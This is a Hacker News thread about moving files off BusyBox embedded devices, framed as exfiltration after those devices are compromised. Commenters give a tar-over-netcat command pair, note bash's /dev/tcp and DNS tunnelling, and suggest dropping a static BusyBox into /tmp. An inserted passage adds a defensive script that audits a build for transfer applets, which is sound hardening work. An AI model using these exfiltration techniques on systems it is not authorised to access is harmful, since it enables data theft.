Exfiltrating files with BusyBox (bitquark.co.uk)
49 points by internetwache on Oct 3, 2016 | 22 comments

That was a let down. Is it really "exfiltration" when you use a protocol designed for mass data transfer and you use it in the exact manner it was intended to be used? The less linkbaity title is "Transferring files with BusyBox's ftp"

The point of the post was to show how easy it is, as people seem to miss these commands or may not be aware of how easy it is to set up a listening service. It's exfiltration by definition, but you are of course free to mangle the data any way you want or use DNS techniques if you really care about hiding what you're doing, but that's a different post.

What is your definition of exfiltration? Or more importantly how do you distinguish between exfil and normal transfer by an authorized user?

There are a lot of embedded devices with fairly trivial vulnerabilities that let you run arbitrary shell commands, but a limited enough set of available commands that getting data out, or doing anything else useful, is nontrivial. (Note that you may not even be able to see the stdout/stderr of the command.) This is showing one way to do that.

Yeah, this is showing one way to copy data from a computer using busybox's ftp client. Where is the surreptitious smuggling? I like my exfil to at least have a hint of James Bond, MacGyver, or Rube Goldberg; otherwise it's just copying files off a computer using the default file transfer tools.

I very much prefer using "tar" and "nc".


Host1: "tar -cf - /file1 /file2 | nc -l -p 54321"

Host2: "nc host1 54321 | tar -xf -"

If you have bash, you can even partially get by without netcat as well. Bash has the wonderful "fake" device nodes, /dev/tcp/host/port and /dev/udp/host/port.

If your system is running busybox you usually won't have full fat bash.

One thing that annoys me is how people will crack a quad core 1.6GHz smartphone with 64Gb of storage and then install busybox to save those 50Mb over a regular shell environment that won't embarrass itself on every shell script or configure script.

It's easier to cross-compile busybox (or toybox) than Bash. Cross compiling for Linux is annoying, cross compiling for Android is even more annoying.

Agreed, I've clarified why I went with ftp and added a note with example usage of nc, thanks!

Indeed, the tools listing in that post makes clear that nc should be available. If you have another Unix machine elsewhere, the nc solution avoids having to install any new software on either machine.

Indeed! I meant to mention the nc option, but I've found that ftpput/get are more often available than nc, perhaps something to do with the ubiquity of ftp.

Much the other way around. Netcat is ubiquitous. I haven't come across many systems with ftpput and ftpget.

Neat challenge left as an exercise to the reader: whois can be used to transfer files too. :)

Interesting, we must be looking at a different class of devices. If we're going down that road, there's always base64 and copy + paste!

>whois can be used to transfer files too.

Ah, the old DNS-tunnelling trick. A fun way to flip cheap hotels the bird.

The ftpput and ftpget commands might not be available even as arguments to the busybox command, depending on how it was configured at build time.

    # type ftpput
    -sh: type: ftpput: not found
    # busybox ftpput
    busybox: applet not found

Likewise for "nc".

I've used similar things to get a dump of router/modem firmware.

Busybox can be built with as many or as few applets as you want. If the busybox you have access to doesn't have what you need, you could always try putting another busybox in /tmp - https://busybox.net/downloads/binaries/ should have a static binary that works on whatever device you have.

You're absolutely right - one of the nice things about Busybox is that it's reasonably easy to configure which utilities you'd like included in the build.

Your example along with OP's showcase why it's a good idea to audit the utilities you include at build time!
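The build-time audit suggested above, as an added example that is not from the thread: a POSIX sh script that lists which of the data-transfer applets named in this discussion (ftpput, ftpget, nc, wget, tftp, httpd, uuencode and friends) a given BusyBox binary was built with. It assumes `busybox --list` prints one applet name per line, which current BusyBox releases do.

```shell
#!/bin/sh
# Audit a BusyBox build for applets that can move data off the device.
# Added example, not from the thread. The watch-list is the set of
# applets mentioned in the discussion; extend it to taste.

TRANSFER_APPLETS="ftpput ftpget nc wget tftp httpd uuencode uudecode base64"

# check_applets: read applet names (one per line) on stdin and print the
# watch-listed ones that are present, sorted, one per line.
check_applets() {
    found=""
    while IFS= read -r applet; do
        for watch in $TRANSFER_APPLETS; do
            if [ "$applet" = "$watch" ]; then
                found="$found $applet"
            fi
        done
    done
    for f in $found; do
        printf '%s\n' "$f"
    done | sort
}

# audit_busybox: run the check against a real binary (default: the
# busybox found in PATH). Exits 2 if no binary is available.
audit_busybox() {
    bin="${1:-busybox}"
    if ! command -v "$bin" >/dev/null 2>&1; then
        echo "no busybox binary found at '$bin'" >&2
        return 2
    fi
    "$bin" --list | check_applets
}
```

Run `audit_busybox /path/to/busybox` on the build output; an empty result means none of the watch-listed applets were compiled in.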

Don't forget that these stupid little devices nearly ALWAYS have a webserver running //somewhere// on them.

If you really need to get some data off, look at how much memory you have and just window the copied data in to files you can DL.

Many of the less expensive and crappier ones ship with very little memory, very little flash, and a VERY restrictive busybox build.

Still, somewhere between that and the kernel are going to be the tools you need to get chunks of data out.

We ($work) have some embedded devices running BusyBox and I typically just use TFTP. It's simple, it works, and we already have an internal TFTP server.

I had to get some files off/on a hacked device over a serial port (networking was broken). Luckily the BusyBox included uuencode/decode so I didn't have to get too extreme.

"Exfiltrating" implies a covert action... Using ftp is kinda obvious!

busybox also has wget and an httpd
